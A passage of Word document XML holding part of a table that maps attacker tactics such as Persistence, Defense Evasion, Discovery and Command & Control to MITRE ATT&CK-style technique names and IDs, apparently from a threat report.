          <w:p w14:paraId="6B176389" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="7A8D1073" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22E455FD" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC38608" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rootkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F9A072" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1014</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="55DB3373" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10BD0038" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBE224F" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="423712DB" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1055</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="2E311161" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55519F17" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="375106CE" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A7ED152" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1036.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="52FC12D4" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B7480DE" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F809B31" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Clear Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73CE78C5" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1070.007</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="1ED45BDD" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B6B3332" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A97D962" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Prevent Command History Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E7B64BC" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1690</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="724953C2" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53D4DF69" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="288BACD7" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Process Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11728AF3" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1057</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="2F6F22C2" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="021F1E42" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED8894A" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5417C861" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="027B3EA2" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55952712" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5608B907" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network Sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AF1311" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1040</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="504BBC6A" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D1E7CF4" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25AC8E03" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Non-Application Layer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D0CCBF" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1095</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="55EB771C" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0488001C" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7078DE3A" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proxy / Multi-hop Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67F24FC7" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1090 / T1090.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="6710DD88" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="454543A4" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D40B596" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
